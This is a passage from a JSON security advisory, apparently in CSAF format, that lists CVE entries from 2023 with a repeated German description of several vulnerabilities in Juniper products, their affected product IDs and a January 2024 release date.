"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-23454"
},
{
"cve": "CVE-2023-22809",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-22809"
},
{
"cve": "CVE-2023-2235",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-2235"
},
{
"cve": "CVE-2023-22081",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-22081"
},
{
"cve": "CVE-2023-22049",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-22049"
},
{
"cve": "CVE-2023-22045",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-22045"
},
{
"cve": "CVE-2023-21968",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21968"
},
{
"cve": "CVE-2023-21967",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21967"
},
{
"cve": "CVE-2023-21954",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21954"
},
{
"cve": "CVE-2023-2194",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-2194"
},
{
"cve": "CVE-2023-21939",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21939"
},
{
"cve": "CVE-2023-21938",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21938"
},
{
"cve": "CVE-2023-21937",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21937"
},
{
"cve": "CVE-2023-21930",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21930"
},
{
"cve": "CVE-2023-21843",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21843"
},
{
"cve": "CVE-2023-21830",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-21830"
},
{
"cve": "CVE-2023-2124",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-2124"
},
{
"cve": "CVE-2023-20593",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-20593"
},
{
"cve": "CVE-2023-20569",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-20569"
},
{
"cve": "CVE-2023-1829",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-1829"
},
{
"cve": "CVE-2023-1582",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-1582"
},
{
"cve": "CVE-2023-1281",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-1281"
},
{
"cve": "CVE-2023-1195",
"notes": [
{
"category": "description",
